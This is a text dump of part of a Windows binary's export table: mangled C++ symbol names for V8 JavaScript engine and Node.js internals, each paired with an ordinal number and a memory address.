                                  ?CanPeel@LoopPeeler@compiler@internal@v8@@QEAA_NPEAVLoop@LoopTree@234@@Z33780x140fa1f40
                                  ?CanProduceSignalingNaN@InstructionSelector@compiler@internal@v8@@AEAA_NPEAVNode@234@@Z33790x140e35450
                                  ?CanReadUnaligned@RegExpBytecodeGenerator@internal@v8@@UEAA_NXZ33800x140077dd0
                                  ?CanRegisterUnwindInfoForNonABICompliantCodeRange@WasmCodeManager@wasm@internal@v8@@QEBA_NXZ33810x14056ef60
                                  ?CanTailCall@CallDescriptor@compiler@internal@v8@@QEBA_NPEBV1234@@Z33820x140e67470
                                  ?CanTransition@MapRef@compiler@internal@v8@@QEBA_NXZ33830x140ddb2b0
                                  ?CanTreatHoleAsUndefined@JSNativeContextSpecialization@compiler@internal@v8@@AEAA_NAEBV?$ZoneVector@V?$Handle@VMap@internal@v8@@@internal@v8@@@34@@Z33840x140f7fd80
                                  ?CanUseRootsRegister@InstructionSelector@compiler@internal@v8@@QEBA_NXZ33850x140e35470
                                  ?Cancel@Cancelable@internal@v8@@AEAA_NXZ33860x140421ba0
                                  ?CancelAndWait@CancelableTaskManager@internal@v8@@QEAAXXZ33870x1405f69c0
                                  ?CancelPendingDelayedTasks@MultiIsolatePlatform@node@@UEAAXPEAVIsolate@v8@@@Z33880x1400768e0
                                  ?CancelScheduledExceptionFromTryCatch@Isolate@internal@v8@@QEAAXPEAVTryCatch@3@@Z33890x14097a410
                                  ?CancelTerminateExecution@Isolate@internal@v8@@QEAAXXZ33900x14097a460
                                  ?CancelTerminateExecution@Isolate@v8@@QEAAXXZ33910x140a7ac10
                                  ?Canonicalize@CharacterSet@internal@v8@@QEAAXXZ33920x1406c0190
                                  ?CanonicalizeShuffle@InstructionSelector@compiler@internal@v8@@AEAAXPEAVNode@234@PEAEPEA_N@Z33930x140e35480
                                  ?CanonicalizeShuffle@InstructionSelector@compiler@internal@v8@@CAX_NPEAEPEA_N2@Z33940x140e356e0
                                  ?CanonicalizeShuffleForTesting@InstructionSelector@compiler@internal@v8@@SAX_NPEAEPEA_N2@Z33950x140459710
                                  ?Capacity@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@IEAAHXZ33960x14041c240
                                  ?Capacity@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@IEAAHXZ33970x14041c240
                                  ?Capacity@HashTableBase@internal@v8@@QEBAHXZ33980x14041c420
                                  ?Capacity@NewSpace@internal@v8@@QEAA_KXZ33990x140421bb0
                                  ?Capacity@OrderedNameDictionaryHandler@internal@v8@@SAHVHeapObject@23@@Z34000x14075dd40
                                  ?Capacity@PagedSpace@internal@v8@@QEAA_KXZ34010x140421be0
                                  ?CapacityForLength@OSROptimizedCodeCache@internal@v8@@CAHH@Z34020x14075b8d0
                                  ?Capture@RegExpMatchInfo@internal@v8@@QEAAHH@Z34030x14041c450
                                  ?CaptureAndSetDetailedStackTrace@Isolate@internal@v8@@QEAA?AV?$MaybeHandle@VJSReceiver@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@@Z34040x14097a4c0
                                  ?CaptureAndSetSimpleStackTrace@Isolate@internal@v8@@QEAA?AV?$MaybeHandle@VJSReceiver@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@W4FrameSkipMode@23@V?$Handle@VObject@internal@v8@@@23@@Z34050x14097a5e0
                                  ?CaptureCurrentStackTrace@Isolate@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@HW4StackTraceOptions@StackTrace@3@@Z34060x14097ac70
                                  ?CaptureSimpleStackTrace@Isolate@internal@v8@@QEAA?AV?$Handle@VObject@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@W4FrameSkipMode@23@V423@@Z34070x14097ad00
                                  ?Case@SwitchBuilder@interpreter@internal@v8@@QEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@H@Z34080x14086cab0
                                  ?Cast@AccessorPair@debug@v8@@SAPEAV123@PEAVValue@3@@Z34090x1400769f0
                                  ?Cast@AccessorSignature@v8@@SAPEAV12@PEAVData@2@@Z34100x1400769f0
                                  ?Cast@Array@v8@@SAPEAV12@PEAVValue@2@@Z34110x1400769f0
                                  ?Cast@ArrayBuffer@v8@@SAPEAV12@PEAVValue@2@@Z34120x1400769f0
                                  ?Cast@ArrayBufferView@v8@@SAPEAV12@PEAVValue@2@@Z34130x1400769f0
                                  ?Cast@BigInt64Array@v8@@SAPEAV12@PEAVValue@2@@Z34140x1400769f0
                                  ?Cast@BigInt@v8@@SAPEAV12@PEAVValue@2@@Z34150x1400769f0
                                  ?Cast@BigIntObject@v8@@SAPEAV12@PEAVValue@2@@Z34160x1400769f0
                                  ?Cast@BigUint64Array@v8@@SAPEAV12@PEAVValue@2@@Z34170x1400769f0
                                  ?Cast@Boolean@v8@@SAPEAV12@PEAVValue@2@@Z34180x1400769f0
                                  ?Cast@BooleanObject@v8@@SAPEAV12@PEAVValue@2@@Z34190x1400769f0
                                  ?Cast@CodeAssembler@compiler@internal@v8@@QEAA?AV?$CheckedNode@VObject@internal@v8@@$0A@@1234@PEAVNode@234@PEBD@Z34200x140077ed0
                                  ?Cast@DataView@v8@@SAPEAV12@PEAVValue@2@@Z34210x1400769f0
                                  ?Cast@Date@v8@@SAPEAV12@PEAVValue@2@@Z34220x1400769f0
                                  ?Cast@External@v8@@SAPEAV12@PEAVValue@2@@Z34230x1400769f0
                                  ?Cast@Float32Array@v8@@SAPEAV12@PEAVValue@2@@Z34240x1400769f0
                                  ?Cast@Float64Array@v8@@SAPEAV12@PEAVValue@2@@Z34250x1400769f0
                                  ?Cast@Function@v8@@SAPEAV12@PEAVValue@2@@Z34260x1400769f0
                                  ?Cast@FunctionTemplate@v8@@SAPEAV12@PEAVData@2@@Z34270x1400769f0
                                  ?Cast@Int16Array@v8@@SAPEAV12@PEAVValue@2@@Z34280x1400769f0
                                  ?Cast@Int32@v8@@SAPEAV12@PEAVValue@2@@Z34290x1400769f0
                                  ?Cast@Int32Array@v8@@SAPEAV12@PEAVValue@2@@Z34300x1400769f0
                                  ?Cast@Int8Array@v8@@SAPEAV12@PEAVValue@2@@Z34310x1400769f0
                                  ?Cast@Integer@v8@@SAPEAV12@PEAVValue@2@@Z34320x1400769f0
                                  ?Cast@Map@v8@@SAPEAV12@PEAVValue@2@@Z34330x1400769f0
                                  ?Cast@Name@v8@@SAPEAV12@PEAVValue@2@@Z34340x1400769f0
                                  ?Cast@Number@v8@@SAPEAV12@PEAVValue@2@@Z34350x1400769f0
                                  ?Cast@NumberObject@v8@@SAPEAV12@PEAVValue@2@@Z34360x1400769f0
                                  ?Cast@Object@v8@@SAPEAV12@PEAVValue@2@@Z34370x1400769f0
                                  ?Cast@ObjectTemplate@v8@@SAPEAV12@PEAVData@2@@Z34380x1400769f0
                                  ?Cast@Private@v8@@SAPEAV12@PEAVData@2@@Z34390x1400769f0
                                  ?Cast@Promise@v8@@SAPEAV12@PEAVValue@2@@Z34400x1400769f0
                                  ?Cast@Proxy@v8@@SAPEAV12@PEAVValue@2@@Z34410x1400769f0
                                  ?Cast@RegExp@v8@@SAPEAV12@PEAVValue@2@@Z34420x1400769f0
                                  ?Cast@Resolver@Promise@v8@@SAPEAV123@PEAVValue@3@@Z34430x1400769f0
                                  ?Cast@Set@v8@@SAPEAV12@PEAVValue@2@@Z34440x1400769f0
                                  ?Cast@SharedArrayBuffer@v8@@SAPEAV12@PEAVValue@2@@Z34450x1400769f0
                                  ?Cast@Signature@v8@@SAPEAV12@PEAVData@2@@Z34460x1400769f0
                                  ?Cast@String@v8@@SAPEAV12@PEAVValue@2@@Z34470x1400769f0
                                  ?Cast@StringObject@v8@@SAPEAV12@PEAVValue@2@@Z34480x1400769f0
                                  ?Cast@Symbol@v8@@SAPEAV12@PEAVValue@2@@Z34490x1400769f0
                                  ?Cast@SymbolObject@v8@@SAPEAV12@PEAVValue@2@@Z34500x1400769f0
                                  ?Cast@TypedArray@v8@@SAPEAV12@PEAVValue@2@@Z34510x1400769f0
                                  ?Cast@Uint16Array@v8@@SAPEAV12@PEAVValue@2@@Z34520x1400769f0
                                  ?Cast@Uint32@v8@@SAPEAV12@PEAVValue@2@@Z34530x1400769f0
                                  ?Cast@Uint32Array@v8@@SAPEAV12@PEAVValue@2@@Z34540x1400769f0
                                  ?Cast@Uint8Array@v8@@SAPEAV12@PEAVValue@2@@Z34550x1400769f0
                                  ?Cast@Uint8ClampedArray@v8@@SAPEAV12@PEAVValue@2@@Z34560x1400769f0
                                  ?Cast@WasmModuleObject@v8@@SAPEAV12@PEAVValue@2@@Z34570x1400769f0
                                  ?Cast@WasmValue@debug@v8@@SAPEAV123@PEAVValue@3@@Z34580x1400769f0
                                  ?Catch@Promise@v8@@QEAA?AV?$MaybeLocal@VPromise@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VFunction@v8@@@2@@Z34590x140a7acc0
                                  ?CautiousShrink@StringTable@internal@v8@@SA?AV?$Handle@VStringTable@internal@v8@@@23@PEAVIsolate@23@V423@@Z34600x14076f8a0
                                  ?CellAlignIndex@Bitmap@internal@v8@@SAII@Z34610x140421bf0
                                  ?CellAt@GlobalDictionary@internal@v8@@QEAA?AVPropertyCell@23@PEBVIsolate@23@VInternalIndex@23@@Z34620x140421c00
                                  ?CellAt@GlobalDictionary@internal@v8@@QEAA?AVPropertyCell@23@VInternalIndex@23@@Z34630x140421c20
                                  ?CellsCount@Bitmap@internal@v8@@SA_KXZ34640x140421c40
                                  ?CellsForLength@Bitmap@internal@v8@@SA_KH@Z34650x140421c50
                                  ?Change@CommonOperatorReducer@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@00@Z34660x140f0c990
                                  ?Change@CommonOperatorReducer@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@0@Z34670x140f0caf0
                                  ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@AEBVCallable@34@HW4FrameStateFlag@1234@@Z34680x140f796f0
                                  ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@0000@Z34690x140f797d0
                                  ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@000@Z34700x140f79a20
                                  ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@00@Z34710x140f79c00
                                  ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@@Z34720x140f79d70
                                  ?Change@SimplifiedOperatorReducer@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@0@Z34730x140fdb660
                                  ?ChangeBitToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34740x140ebbd40
                                  ?ChangeBreakOnException@Debug@internal@v8@@QEAAXW4ExceptionBreakType@23@_N@Z34750x1409be9d0
                                  ?ChangeFloat32ToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UFloat32T@internal@v8@@@34@@Z34760x140e6b1c0
                                  ?ChangeFloat32ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34770x140e0e4b0
                                  ?ChangeFloat32ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z34780x140e6b220
                                  ?ChangeFloat64ToInt32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z34790x140ec3620
                                  ?ChangeFloat64ToInt32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34800x140e0e570
                                  ?ChangeFloat64ToInt32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z34810x140e6b260
                                  ?ChangeFloat64ToInt64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z34820x140ec36d0
                                  ?ChangeFloat64ToInt64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34830x140e0e630
                                  ?ChangeFloat64ToInt64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z34840x140e6b2a0
                                  ?ChangeFloat64ToIntPtr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z34850x140e6b2e0
                                  ?ChangeFloat64ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@@Z34860x140ebbd50
                                  ?ChangeFloat64ToTaggedPointer@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34870x140ebbd90
                                  ?ChangeFloat64ToUint32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint32T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z34880x140e6b350
                                  ?ChangeFloat64ToUint32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z34890x140ec3780
                                  ?ChangeFloat64ToUint32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34900x140e0e6f0
                                  ?ChangeFloat64ToUint32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z34910x140e6b3b0
                                  ?ChangeFloat64ToUint64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint64T@internal@v8@@@34@V?$SloppyTNode@UFloat64T@internal@v8@@@34@@Z34920x140e6b3f0
                                  ?ChangeFloat64ToUint64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34930x140e0e7b0
                                  ?ChangeFloat64ToUint64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z34940x140e6b450
                                  ?ChangeFloat64ToUintPtr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUintPtrT@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z34950x140e6b490
                                  ?ChangeInt31ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34960x140ebbda0
                                  ?ChangeInt32ToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UInt32T@internal@v8@@@34@@Z34970x140e6b500
                                  ?ChangeInt32ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z34980x140ec3830
                                  ?ChangeInt32ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ34990x140e0e870
                                  ?ChangeInt32ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35000x140e6b560
                                  ?ChangeInt32ToInt64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt64T@internal@v8@@@34@V?$SloppyTNode@UInt32T@internal@v8@@@34@@Z35010x140e6b5a0
                                  ?ChangeInt32ToInt64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35020x140ec38e0
                                  ?ChangeInt32ToInt64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35030x140e0e930
                                  ?ChangeInt32ToInt64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35040x140e6b600
                                  ?ChangeInt32ToIntPtr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z35050x140e6b640
                                  ?ChangeInt32ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35060x140ebbdb0
                                  ?ChangeInt64ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35070x140ec3990
                                  ?ChangeInt64ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35080x140e0e9f0
                                  ?ChangeInt64ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35090x140e6b6c0
                                  ?ChangeInt64ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35100x140ebbdc0
                                  ?ChangeOp@NodeProperties@compiler@internal@v8@@SAXPEAVNode@234@PEBVOperator@234@@Z35110x140076d40
                                  ?ChangeTaggedSignedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35120x140ebbdd0
                                  ?ChangeTaggedSignedToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35130x140ebbde0
                                  ?ChangeTaggedToBit@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35140x140ebbdf0
                                  ?ChangeTaggedToFloat64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35150x140ebbe00
                                  ?ChangeTaggedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35160x140ebbe10
                                  ?ChangeTaggedToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35170x140ebbe20
                                  ?ChangeTaggedToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35180x140ebbe30
                                  ?ChangeTaggedToUint32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35190x140ebbe40
                                  ?ChangeUint32ToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@@Z35200x140e6b700
                                  ?ChangeUint32ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35210x140ec3a40
                                  ?ChangeUint32ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35220x140e0eab0
                                  ?ChangeUint32ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35230x140e6b760
                                  ?ChangeUint32ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35240x140ebbe50
                                  ?ChangeUint32ToUint64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint64T@internal@v8@@@34@V?$SloppyTNode@UWord32T@internal@v8@@@34@@Z35250x140e6b7a0
                                  ?ChangeUint32ToUint64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35260x140ec3af0
                                  ?ChangeUint32ToUint64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35270x140e0eb70
                                  ?ChangeUint32ToUint64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z35280x140e6b800
                                  ?ChangeUint32ToWord@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUintPtrT@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z35290x140e6b840
                                  ?ChangeUint64ToBigInt@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35300x140ebbe60
                                  ?ChangeUint64ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ35310x140ebbe70
                                  ?ChangeUintPtrToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@@Z35320x140e6b8c0
                                  ?Changed@Reducer@compiler@internal@v8@@SA?AVReduction@234@PEAVNode@234@@Z35330x140076a70
                                  ?Check@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NW4Value@Token@23@@Z35340x1406f94b0
                                  ?Check@TurboAssembler@internal@v8@@QEAAXW4Condition@23@W4AbortReason@23@@Z35350x140498610
                                  ?CheckApiInterrupt@StackGuard@internal@v8@@QEAA_NXZ35360x140421c60
                                  ?CheckArityRestrictions@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXHW4FunctionKind@23@_NHH@Z35370x1406f94e0
                                  ?CheckAssigningFunctionLiteralToProperty@Parser@internal@v8@@CAXPEAVExpression@23@0@Z35380x1406f95c0
                                  ?CheckAtStart@RegExpBytecodeGenerator@internal@v8@@UEAAXHPEAVLabel@23@@Z35390x1406c8f50
                                  ?CheckAtStart@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z35400x1404436e0
                                  ?CheckBigInt@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z35410x140ff9c30
                                  ?CheckBigInt@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z35420x140ebbe80
                                  ?CheckBitInTable@RegExpBytecodeGenerator@internal@v8@@UEAAXV?$Handle@VByteArray@internal@v8@@@23@PEAVLabel@23@@Z35430x1406c9020
                                  ?CheckBitInTable@RegExpMacroAssemblerX64@internal@v8@@UEAAXV?$Handle@VByteArray@internal@v8@@@23@PEAVLabel@23@@Z35440x1404437c0
                                  ?CheckBounds@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@0@Z35450x140ff9c60
                                  ?CheckBounds@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@V?$Flags@W4CheckBoundsFlag@compiler@internal@v8@@H@base@4@@Z35460x140ebbf70
                                  ?CheckBreakPoint@Debug@internal@v8@@AEAA_NV?$Handle@VBreakPoint@internal@v8@@@23@_N@Z35470x1409be9e0
                                  ?CheckBreakPoints@Debug@internal@v8@@AEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@V?$Handle@VDebugInfo@internal@v8@@@23@PEAVBreakLocation@23@PEA_N@Z35480x1409beb40
                                  ?CheckCallable@Parser@internal@v8@@AEAAPEAVStatement@23@PEAVVariable@23@PEAVExpression@23@H@Z35490x14072b9a0
                                  ?CheckCast@AccessorPair@debug@v8@@CAXPEAVValue@3@@Z35500x140a7b160
                                  ?CheckCast@AccessorSignature@v8@@CAXPEAVData@2@@Z35510x140a7b1e0
                                  ?CheckCast@Array@v8@@CAXPEAVValue@2@@Z35520x140a7b260
                                  ?CheckCast@ArrayBuffer@v8@@CAXPEAVValue@2@@Z35530x140a7b2e0
                                  ?CheckCast@ArrayBufferView@v8@@CAXPEAVValue@2@@Z35540x140a7b370
                                  ?CheckCast@BigInt64Array@v8@@CAXPEAVValue@2@@Z35550x140a7b400
                                  ?CheckCast@BigInt@v8@@CAXPEAVValue@2@@Z35560x140a7b4a0
                                  ?CheckCast@BigIntObject@v8@@CAXPEAVValue@2@@Z35570x140a7b520
                                  ?CheckCast@BigUint64Array@v8@@CAXPEAVValue@2@@Z35580x140a7b5c0
                                  ?CheckCast@Boolean@v8@@CAXPEAVValue@2@@Z35590x140a7b660
                                  ?CheckCast@BooleanObject@v8@@CAXPEAVValue@2@@Z35600x140a7b6f0
                                  ?CheckCast@DataView@v8@@CAXPEAVValue@2@@Z35610x140a7b790
                                  ?CheckCast@Date@v8@@CAXPEAVValue@2@@Z35620x140a7b810
                                  ?CheckCast@External@v8@@CAXPEAVValue@2@@Z35630x140a7b890
                                  ?CheckCast@Float32Array@v8@@CAXPEAVValue@2@@Z35640x140a7b940
                                  ?CheckCast@Float64Array@v8@@CAXPEAVValue@2@@Z35650x140a7b9e0
                                  ?CheckCast@Function@v8@@CAXPEAVValue@2@@Z35660x140a7ba80
                                  ?CheckCast@FunctionTemplate@v8@@CAXPEAVData@2@@Z35670x140a7bb00
                                  ?CheckCast@Int16Array@v8@@CAXPEAVValue@2@@Z35680x140a7bb80
                                  ?CheckCast@Int32@v8@@CAXPEAVValue@2@@Z35690x140a7bc20
                                  ?CheckCast@Int32Array@v8@@CAXPEAVValue@2@@Z35700x140a7bca0
                                  ?CheckCast@Int8Array@v8@@CAXPEAVValue@2@@Z35710x140a7bd40
                                  ?CheckCast@Integer@v8@@CAXPEAVValue@2@@Z35720x140a7bde0
                                  ?CheckCast@Map@v8@@CAXPEAVValue@2@@Z35730x140a7be60
                                  ?CheckCast@Name@v8@@CAXPEAVValue@2@@Z35740x140a7bee0
                                  ?CheckCast@Number@v8@@CAXPEAVValue@2@@Z35750x140a7bf60
                                  ?CheckCast@NumberObject@v8@@CAXPEAVValue@2@@Z35760x140a7bfe0
                                  ?CheckCast@Object@v8@@CAXPEAVValue@2@@Z35770x140a7c080
                                  ?CheckCast@ObjectTemplate@v8@@CAXPEAVData@2@@Z35780x140a7c100
                                  ?CheckCast@Private@v8@@CAXPEAVData@2@@Z35790x140a7c180
                                  ?CheckCast@Promise@v8@@CAXPEAVValue@2@@Z35800x140a7c210
                                  ?CheckCast@Proxy@v8@@CAXPEAVValue@2@@Z35810x140a7c290
                                  ?CheckCast@RegExp@v8@@CAXPEAVValue@2@@Z35820x140a7c310
                                  ?CheckCast@Resolver@Promise@v8@@CAXPEAVValue@3@@Z35830x140a7c390
                                  ?CheckCast@Set@v8@@CAXPEAVValue@2@@Z35840x140a7c410
                                  ?CheckCast@SharedArrayBuffer@v8@@CAXPEAVValue@2@@Z35850x140a7c490
                                  ?CheckCast@Signature@v8@@CAXPEAVData@2@@Z35860x140a7c520
                                  ?CheckCast@String@v8@@CAXPEAVValue@2@@Z35870x140a7c5a0
                                  ?CheckCast@StringObject@v8@@CAXPEAVValue@2@@Z35880x140a7c620
                                  ?CheckCast@Symbol@v8@@CAXPEAVValue@2@@Z35890x140a7c6c0
                                  ?CheckCast@SymbolObject@v8@@CAXPEAVValue@2@@Z35900x140a7c740
                                  ?CheckCast@TypedArray@v8@@CAXPEAVValue@2@@Z35910x140a7c7e0
                                  ?CheckCast@Uint16Array@v8@@CAXPEAVValue@2@@Z35920x140a7c860
                                  ?CheckCast@Uint32@v8@@CAXPEAVValue@2@@Z35930x140a7c900
                                  ?CheckCast@Uint32Array@v8@@CAXPEAVValue@2@@Z35940x140a7c980
                                  ?CheckCast@Uint8Array@v8@@CAXPEAVValue@2@@Z35950x140a7ca20
                                  ?CheckCast@Uint8ClampedArray@v8@@CAXPEAVValue@2@@Z35960x140a7cac0
                                  ?CheckCast@WasmModuleObject@v8@@CAXPEAVValue@2@@Z35970x140a7cb60
                                  ?CheckCast@WasmValue@debug@v8@@CAXPEAVValue@3@@Z35980x140a7cbe0
                                  ?CheckCharacter@RegExpBytecodeGenerator@internal@v8@@UEAAXIPEAVLabel@23@@Z35990x1406c9220
                                  ?CheckCharacter@RegExpMacroAssemblerX64@internal@v8@@UEAAXIPEAVLabel@23@@Z36000x1404438d0
                                  ?CheckCharacterAfterAnd@RegExpBytecodeGenerator@internal@v8@@UEAAXIIPEAVLabel@23@@Z36010x1406c9330
                                  ?CheckCharacterAfterAnd@RegExpMacroAssemblerX64@internal@v8@@UEAAXIIPEAVLabel@23@@Z36020x140443940
                                  ?CheckCharacterGT@RegExpBytecodeGenerator@internal@v8@@UEAAXGPEAVLabel@23@@Z36030x1406c9460
                                  ?CheckCharacterGT@RegExpMacroAssemblerX64@internal@v8@@UEAAXGPEAVLabel@23@@Z36040x140443a00
                                  ?CheckCharacterInRange@RegExpBytecodeGenerator@internal@v8@@UEAAXGGPEAVLabel@23@@Z36050x1406c9530
                                  ?CheckCharacterInRange@RegExpMacroAssemblerX64@internal@v8@@UEAAXGGPEAVLabel@23@@Z36060x140443a70
                                  ?CheckCharacterLT@RegExpBytecodeGenerator@internal@v8@@UEAAXGPEAVLabel@23@@Z36070x1406c9640
                                  ?CheckCharacterLT@RegExpMacroAssemblerX64@internal@v8@@UEAAXGPEAVLabel@23@@Z36080x140443b40
                                  ?CheckCharacterNotInRange@RegExpBytecodeGenerator@internal@v8@@UEAAXGGPEAVLabel@23@@Z36090x1406c9710
                                  ?CheckCharacterNotInRange@RegExpMacroAssemblerX64@internal@v8@@UEAAXGGPEAVLabel@23@@Z36100x140443bb0
                                  ?CheckClassFieldName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@_N@Z36110x1406f95e0
                                  ?CheckClassMethodName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@W4ParsePropertyKind@23@V?$Flags@W4ParseFunctionFlag@internal@v8@@H@base@3@_NPEA_N@Z36120x1406f9630
                                  ?CheckClosure@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VFeedbackCell@internal@v8@@@34@@Z36130x140ebc100
                                  ?CheckConflictingVarDeclarations@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEAVDeclarationScope@23@@Z36140x1406f96c0
                                  ?CheckConflictingVarDeclarations@DeclarationScope@internal@v8@@QEAAPEAVDeclaration@23@PEA_N@Z36150x140a53610
                                  ?CheckContextualKeyword@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEBVAstRawString@23@@Z36160x1406f9740
                                  ?CheckDeoptMarkedAllocationSites@StackGuard@internal@v8@@QEAA_NXZ36170x140421c70
                                  ?CheckDetachedContextsAfterGC@Isolate@internal@v8@@QEAAXXZ36180x14097b740
